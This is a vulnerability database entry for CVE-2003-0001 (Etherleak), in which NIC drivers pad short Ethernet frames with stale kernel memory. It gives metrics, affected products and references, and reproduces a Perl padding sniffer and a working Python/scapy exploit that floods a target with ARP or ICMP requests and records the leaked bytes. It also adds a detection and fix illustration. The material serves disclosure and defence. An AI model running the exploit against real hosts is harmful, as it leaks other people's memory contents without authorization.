CVE-2003-0001: Detail

CVE-2003-0001

OWASP category: A01 Broken Access Control
Attack vector: Network
Published: 2003-01-08 04:00 +00:00
Last modified: 2018-10-19 12:57 +00:00


Description

Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak.

The mechanism behind the record: an Ethernet frame must carry at least 46 bytes of payload (60 bytes on the wire before the FCS). When a protocol hands the driver less than that, such as a short ARP reply or an ICMP echo reply with no data, the driver or NIC has to pad the frame up to the minimum. An affected driver tells the hardware to transmit 60 bytes from a buffer that only holds the payload, so the bytes that happened to follow it in memory (the tail of an earlier packet, or other kernel data) are sent to the remote peer. An attacker triggers it simply by eliciting short replies and reading the trailing bytes.

Information

Related weaknesses

CWE-ID   Weakness name                                                  Source
CWE-200  Exposure of Sensitive Information to an Unauthorized Actor
The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

Metrics

Metric  Score  Severity  CVSS vector                      Source
V2      5.0    Medium    AV:N/AC:L/Au:N/C:P/I:N/A:N       [email protected]

EPSS

EPSS is a scoring model that predicts the probability that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of other CVEs. The percentile thus serves to compare one CVE's EPSS score against other CVEs.

Exploit information

Exploit Database EDB-ID: 22131

Published: 2007-03-22 23:00 +00:00
Author: Jon Hart
EDB verified: Yes

source: https://www.securityfocus.com/bid/6535/info

Network device drivers for several vendors have been reported to disclose potentially sensitive information to attackers. Frames that are smaller than the minimum frame size should have the unused portion of the frame buffer padded with null (or other) bytes. Some device drivers fail to do this adequately, leaving the data that was stored in the memory comprising the buffer prior to its use intact. Consequently, this data may be transmitted within frames across Ethernet segments. Since the Ethernet frame buffer is allocated in kernel memory space, sensitive data may be leaked.

Cisco has stated that the IOS 12.1 and 12.2 trains are not affected. National Semiconductor Ethernet controller chips are not vulnerable to this issue.

#!/usr/bin/perl -w
# etherleak, code that has been 5 years coming.
#
# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,
# a vulnerability that would become known as the 'etherleak' bug. In
# various situations an ethernet frame must be padded to reach a specific
# size or fall on a certain boundary. This task is left up to the driver
# for the ethernet device. The RFCs state that this padding must consist
# of NULLs. The bug is that at the time and still to this day, many device
# drivers do not pad with NULLs, but rather pad with unsanitized portions
# of kernel memory, oftentimes exposing sensitive information to remote
# systems or those savvy enough to coerce their targets to do so.
#
# Proof of this can be found by googling for 'warchild and etherleak', or
# by visiting:
#
# http://lkml.org/lkml/2002/4/27/101
#
# This was ultimately fixed in the Linux kernel, but over time this
# vulnerability reared its head numerous times, but at the core the
# vulnerability was the same as the one I originally published. The most
# public of these was CVE-2003-0001, which was assigned to address an
# official @stake advisory.
#
# This code can be found in its most current form at:
#
# http://spoofed.org/files/exploits/etherleak
#
# Jon Hart <[email protected]>, March 2007
#

use strict;
use diagnostics;
use warnings;
use Getopt::Long;
use Net::Pcap;
use NetPacket::Ethernet qw(:ALL);
use NetPacket::IP qw(:ALL);

my %opts = ();
my ($iface, $err, $pcap_t, $pcap_save, $filter_string);

# On a bad option: print usage, then abort with the error.
GetOptions(\%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose')
    or do { &usage(); die "Unknown option: $!\n"; };

if (defined($opts{'help'})) {
    &usage();
    exit(0);
}

# Either replay a saved capture or sniff live on an interface.
if (defined($opts{'read'})) {
    $pcap_t = Net::Pcap::open_offline($opts{'read'}, \$err);
    if (!defined($pcap_t)) {
        print("Net::Pcap::open_offline failed: $err\n");
        exit 1;
    }
} else {
    if (defined($opts{'interface'})) {
        $iface = $opts{'interface'};
    } else {
        $iface = Net::Pcap::lookupdev(\$err);
        if (defined($err)) {
            print(STDERR "lookupdev() failed: $err\n");
            exit(1);
        } else {
            print(STDERR "No interface specified. Using $iface\n");
        }
    }
    $pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \$err);
    if (!defined($pcap_t)) {
        print("Net::Pcap::open_live failed on $iface: $err\n");
        exit 1;
    }
}

my $filter;
if (Net::Pcap::compile($pcap_t, \$filter, defined($opts{'filter'}) ? $opts{'filter'} : "", 0, 0) == -1) {
    printf("Net::Pcap::compile failed: %s\n", Net::Pcap::geterr($pcap_t));
    exit(1);
}
if (Net::Pcap::setfilter($pcap_t, $filter) == -1) {
    printf("Net::Pcap::setfilter failed: %s\n", Net::Pcap::geterr($pcap_t));
    exit(1);
}

# Optionally save every frame with a suspicious trailer to a pcap file.
if (defined($opts{'write'})) {
    $pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'});
    if (!defined($pcap_save)) {
        printf("Net::Pcap::dump_open failed: %s\n", Net::Pcap::geterr($pcap_t));
        exit(1);
    }
}

Net::Pcap::loop($pcap_t, -1, \&process, "foo");
Net::Pcap::close($pcap_t);
if (defined($opts{'write'})) {
    Net::Pcap::dump_close($pcap_save);
}

# Per-frame callback: work out where the protocol payload ends ($jump),
# then treat everything after it as padding and inspect it.
sub process {
    my ($user, $hdr, $pkt) = @_;
    my ($link, $ip);
    my $jump = 0;
    my $datalink = Net::Pcap::datalink($pcap_t);

    if ($datalink == 1) {          # DLT_EN10MB
        $jump += 14;
    } elsif ($datalink == 113) {   # DLT_LINUX_SLL
        $jump += 16;
    } else {
        printf("Skipping datalink $datalink\n");
        return;
    }

    my $l2 = NetPacket::Ethernet->decode($pkt);
    if ($l2->{type} == ETH_TYPE_IP) {
        $ip = NetPacket::IP->decode(eth_strip($pkt));
        $jump += $ip->{len};       # IP total length covers header + payload
    } elsif ($l2->{type} == ETH_TYPE_ARP) {
        $jump += 28;               # fixed-size ARP body for Ethernet/IPv4
    } else {
        # assume 802.3 ethernet, and just jump ahead the length
        for ($l2->{dest_mac}) {
            if (/^0180c200/) {
                # spanning tree
                # l2->{type} here will actually be the length. HACK.
                $jump += $l2->{type};
            } elsif (/^01000ccccc/) {
                # CDP/VTP/DTP/PAgP/UDLD/PVST, etc
                # l2->{type} here will actually be the length. HACK.
                $jump += $l2->{type};
            } elsif (/^ab0000020000/) {
                # DEC-MOP-Remote-Console
                return;
            } else {
                # loopback
                if ($l2->{src_mac} eq $l2->{dest_mac}) {
                    return;
                }
                printf("Skipping datalink $datalink l2 type %s\n", $l2->{type});
                return;
            }
        }
    }

    if ($hdr->{len} > $jump) {
        my $trailer_bin = substr($pkt, $jump);
        my $trailer_hex = "";
        my $trailer_ascii = "";
        foreach (split(//, $trailer_bin)) {
            $trailer_hex .= sprintf("%02x", ord($_));
            if (ord($_) >= 32 && ord($_) <= 126) {
                $trailer_ascii .= $_;
            } else {
                $trailer_ascii .= ".";
            }
        }
        # ignore all trailers that are just single characters repeated.
        # most OS' use 0, F, 5 or a.
        unless ($trailer_hex =~ /^(0|5|f|a)\1*$/i) {
            unless ($opts{'quiet'}) {
                print("#" x 80, "\n");
                printf("%s -> %s\n", $l2->{src_mac}, $l2->{dest_mac});
                if ($l2->{type} == ETH_TYPE_IP) {
                    printf("%s -> %s\n", $ip->{src_ip}, $ip->{dest_ip});
                }
            }
            print("$trailer_hex\t$trailer_ascii\n");
            if (defined($opts{'write'})) {
                Net::Pcap::dump($pcap_save, $hdr, $pkt);
            }
        }
    }
}

sub usage {
    print <<EOF;
$0 -- A demonstration of the infamous 'etherleak' bug.
CVE-2003-0001, and countless repeats of the same vulnerability.

Options:
    [-h|--help]                    # this message
    [-i|--interface] <interface>   # interface to listen on
    [-f|--filter] <pcap filter>    # apply this filter to the traffic
    [-r|--read] <path to pcap>     # read from this saved pcap file
    [-w|--write] <path to pcap>    # write to this saved pcap file
    [-q|--quiet]                   # be quiet
    [-v|--verbose]                 # be verbose
EOF
}

# milw0rm.com [2007-03-23]
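The check the script above performs, reduced to its core as an added example (this is not code from the page or from Exploit-DB, and it is Python 3 with only the standard library): compute where the protocol payload ends from the protocol's own length field (the IPv4 total length, or the fixed 28-byte ARP body), treat whatever follows as padding, and flag padding that is not one repeated byte. It generalizes the Perl heuristic, which only accepts repeated 0, 5, f or a nibbles, to any single repeated byte value. It also shows the driver-side fix as a function: zero-filling up to the 60-byte minimum before transmission. The MAC and IP addresses, the "stale memory" string and the function names are constructed for illustration and are not from the advisory.

```python
import struct

# Ethernet constants (IEEE 802.3 / RFC 894)
ETH_HLEN = 14        # dst MAC (6) + src MAC (6) + EtherType (2)
ETH_ZLEN = 60        # minimum frame length on the wire, excluding the 4-byte FCS
ETH_P_IP = 0x0800
ETH_P_ARP = 0x0806
ARP_IPV4_LEN = 28    # ARP over Ethernet/IPv4: 8-byte header + 2 x (6-byte MAC + 4-byte IP)


def payload_end(frame):
    """Offset where the protocol payload ends, taken from the protocol's own
    length fields rather than from the frame length. None for EtherTypes this
    function does not know how to measure."""
    if len(frame) < ETH_HLEN:
        return None
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype == ETH_P_IP:
        if len(frame) < ETH_HLEN + 20:
            return None
        total_len = struct.unpack("!H", frame[ETH_HLEN + 2:ETH_HLEN + 4])[0]
        return ETH_HLEN + total_len
    if ethertype == ETH_P_ARP:
        return ETH_HLEN + ARP_IPV4_LEN
    return None


def trailer(frame):
    """Bytes after the protocol payload: the padding the sender had to add."""
    end = payload_end(frame)
    if end is None or end > len(frame):
        return b""
    return frame[end:]


def is_leaky(pad):
    """One repeated byte (00, ff, 55, aa ...) is what a correct driver or NIC
    produces; padding with several distinct byte values is stale buffer
    contents and worth a look."""
    return len(pad) > 0 and len(set(pad)) > 1


def pad_frame(frame):
    """The driver-side fix: zero-fill explicitly up to ETH_ZLEN instead of
    asking the NIC to transmit ETH_ZLEN bytes from a buffer that only holds
    len(frame) valid ones."""
    if len(frame) >= ETH_ZLEN:
        return frame
    return frame + b"\x00" * (ETH_ZLEN - len(frame))


def scan(frames):
    """(index, trailer) for every frame whose padding looks like a leak."""
    return [(i, trailer(f)) for i, f in enumerate(frames) if is_leaky(trailer(f))]


# --- constructed sample traffic (assumed addresses, not captured from a real host) ---

def build_arp_request(src_mac, src_ip, dst_ip):
    """42-byte ARP who-has: 18 bytes short of the minimum frame length."""
    eth = b"\xff" * 6 + src_mac + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, ETH_P_IP, 6, 4, 1)   # Ethernet, IPv4, opcode request
           + src_mac + src_ip + b"\x00" * 6 + dst_ip)
    return eth + arp


def build_icmp_echo(src_mac, dst_mac, src_ip, dst_ip):
    """42-byte ICMP echo request with no data; checksums left zero because the
    frame is only parsed locally, never sent."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, 1, 1)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0, src_ip, dst_ip)
    return dst_mac + src_mac + struct.pack("!H", ETH_P_IP) + ip + icmp


SRC_MAC = bytes.fromhex("020000000001")
DST_MAC = bytes.fromhex("020000000002")
SRC_IP = bytes([10, 0, 0, 1])
DST_IP = bytes([10, 0, 0, 2])

STALE = b"root:x:0:0:root:/r"   # 18 bytes standing in for leftover kernel memory

SHORT_ARP = build_arp_request(SRC_MAC, SRC_IP, DST_IP)
CLEAN_FRAME = pad_frame(SHORT_ARP)      # what a fixed driver puts on the wire
LEAKY_FRAME = SHORT_ARP + STALE         # what an affected driver puts on the wire
ICMP_FRAME = build_icmp_echo(SRC_MAC, DST_MAC, SRC_IP, DST_IP) + STALE

if __name__ == "__main__":
    for idx, pad in scan([CLEAN_FRAME, LEAKY_FRAME, ICMP_FRAME]):
        print("frame %d leaks %d bytes: %s" % (idx, len(pad), pad.hex()))
```

To run it over real traffic, feed scan() the raw frames from a capture (for example the packet bytes a pcap reader hands back on a DLT_EN10MB link); the decision logic is the same as the Perl script's, with the IP total-length field doing the work of telling payload from padding.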
Exploit Database EDB-ID: 26076

Published: 2013-06-09 22:00 +00:00
Author: prdelka
EDB verified: No

#!/usr/bin/env python
# CVE-2003-0001 'Etherleak' exploit
# =================================
# Exploit for hosts which use a network device driver that pads
# ethernet frames with data which vary from one packet to another,
# likely taken from kernel memory, system memory allocated to
# the device driver, or a hardware buffer on its network interface
# card. Exploit uses scapy with either ICMP or ARP requests as
# this can trigger with either but ICMP can hit layer3 filtering
# rules. Using ARP the padding appears to leak only fixed constant
# values when exploited, ICMP leaks random bytes.
#
# root@bt:~/0d# python cve-2003-0001.py x.x.x.254 icmp leaky
# WARNING: No route found for IPv6 destination :: (no default route?)
# [ CVE-2003-0001 'Etherleak' exploit
# [ Attacking x.x.x.254 for icmp padding saved to leaky.hex
# ............................................................^C!Killing
# !Killing
# root@bt:~/0d# hexdump -C leaky | head
# 00000000  e6 bd a6 9b 90 eb 44 f5  18 a5 29 2a 16 5a 08 ff  |......D...)*.Z..|
# 00000010  43 e1 23 07 8f 96 5a 24  3f 3d 33 7d b4 97 7e 18  |C.#...Z$?=3}..~.|
# 00000020  05 c9 7c 2c a5 c0 fa 7a  76 f3 51 c0 fe 07 72 32  |..|,...zv.Q...r2|
# 00000030  9e ad 6a 67 ad 43 58 17  60 43 bc 2b b8 fb cc 70  |..jg.CX.`C.+...p|
# 00000040  99 92 80 84 03 03 6f 8f  18 d3 5b 5e f0 1e 3a 83  |......o...[^..:.|
# 00000050  3d 82 e7 cd 3e 1f 31 74  b0 06 8c a2 7e 14 6b fb  |=...>.1t....~.k.|
# 00000060  72 9b ac 64 74 9b a4 d9  23 5b 92 82 0d 0b 31 f0  |r..dt...#[....1.|
# 00000070  a9 4f dd 3f bf 2b 5c 67  6c 22 fa da d0 2b d6 39  |.O.?.+\gl"...+.9|
# 00000080  40 58 13 4f 3d bb 48 03  d3 53 3c 5c 44 d2 3d b2  |@X.O=.H..S<\D.=.|
# 00000090  4f f2 a9 4a 02 80 4e 1b  6c bd 69 89 bd 76 1b 0a  |O..J..N.l.i..v..|
#
# This issue has been resolved in ASA 8.4.4.6/8.2.5.32. Cisco Bug reference
# is CSCua88376 and PSIRT-0669464365.
#
# -- prdelka
#
# (Python 2 script: print statements, str() on packet layers.)
import os
import sys
import signal
import binascii
from scapy.all import *

def signalhandler(signal,id):
    print "!Killing"
    sys.exit(0)

# Sender side: hammer the target with requests so it keeps emitting
# short replies that must be padded by its driver.
def spawn(host,type):
    if type == 'arp':
        send(ARP(pdst=host),loop=1,nofilter=1)
    elif type == 'icmp':
        send(IP(dst=host)/ICMP(type=8)/'x',loop=1,nofilter=1)

if __name__ == "__main__":
    print "[ CVE-2003-0001 'Etherleak' exploit"
    signal.signal(signal.SIGINT,signalhandler)
    if len(sys.argv) < 4:
        print "[ No! Use with <host> <arp|icmp> <file>"
        sys.exit(1)
    type = sys.argv[2]
    if type == 'arp':
        pass
    elif type == 'icmp':
        pass
    else:
        print "Bad type!"
        sys.exit(0)
    # Parent sends forever; the forked child sniffs the replies.
    pid = os.fork()
    if(pid):
        print "[ Attacking %s for %s padding saved to %s.hex" % (sys.argv[1],sys.argv[2],sys.argv[3])
        spawn(sys.argv[1],sys.argv[2])
    while True:
        if type == 'arp':
            myfilter = "host %s and arp" % sys.argv[1]
        elif type == 'icmp':
            myfilter = "host %s and icmp" % sys.argv[1]
        # Only keep frames scapy has recognised as carrying a Padding layer.
        x = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding))
        p = x[0]
        if type == 'arp':
            pad = p.getlayer(2)    # Ether/ARP/Padding
        if type == 'icmp':
            pad = p.getlayer(4)    # Ether/IP/ICMP/Raw/Padding
        leak = str(pad)
        hexfull = binascii.b2a_hex(leak)
        file = "%s.hex"%sys.argv[3]
        fdesc = open(file,"a")
        fdesc.write(hexfull + "\n")
        fdesc.close()
        # 32 bits leaked here for me.
        if type == 'icmp':
            bytes = leak[9:13]
        elif type == 'arp':
            bytes = leak[10:14]
        fdesc = open(sys.argv[3],"ab")
        fdesc.write(bytes)
        fdesc.close()
Exploit Database EDB-ID: 3555

Published: 2007-03-22 23:00 +00:00
Author: Jon Hart
EDB verified: Yes

(The milw0rm original of the same etherleak Perl script; the code is identical to the copy listed under EDB-ID 22131 above and is not repeated here.)

Products mentioned

Configuration 0

FreeBSD 4.2, 4.3, 4.4, 4.5, 4.6, 4.7
Linux kernel 2.4.1, 2.4.2, 2.4.3, 2.4.4, 2.4.5, 2.4.6, 2.4.7, 2.4.8, 2.4.9, 2.4.10, 2.4.11, 2.4.12, 2.4.13, 2.4.14, 2.4.15, 2.4.16, 2.4.17, 2.4.18, 2.4.19, 2.4.20
Microsoft Windows 2000 (all versions)
Microsoft Windows 2000 Terminal Services (all versions)
NetBSD 1.5, 1.5.1, 1.5.2, 1.5.3, 1.6

References

http://www.securitytracker.com/id/1031583
Tags: vdb-entry, x_refsource_SECTRACK
http://www.osvdb.org/9962
Tags: vdb-entry, x_refsource_OSVDB
http://www.redhat.com/support/errata/RHSA-2003-088.html
Tags: vendor-advisory, x_refsource_REDHAT
http://marc.info/?l=bugtraq&m=104222046632243&w=2
Tags: mailing-list, x_refsource_BUGTRAQ
http://www.kb.cert.org/vuls/id/412115
Tags: third-party-advisory, x_refsource_CERT-VN
http://www.redhat.com/support/errata/RHSA-2003-025.html
Tags: vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/7996
Tags: third-party-advisory, x_refsource_SECUNIA
http://www.atstake.com/research/advisories/2003/a010603-1.txt
Tags: vendor-advisory, x_refsource_ATSTAKE
http://www.securitytracker.com/id/1040185
Tags: vdb-entry, x_refsource_SECTRACK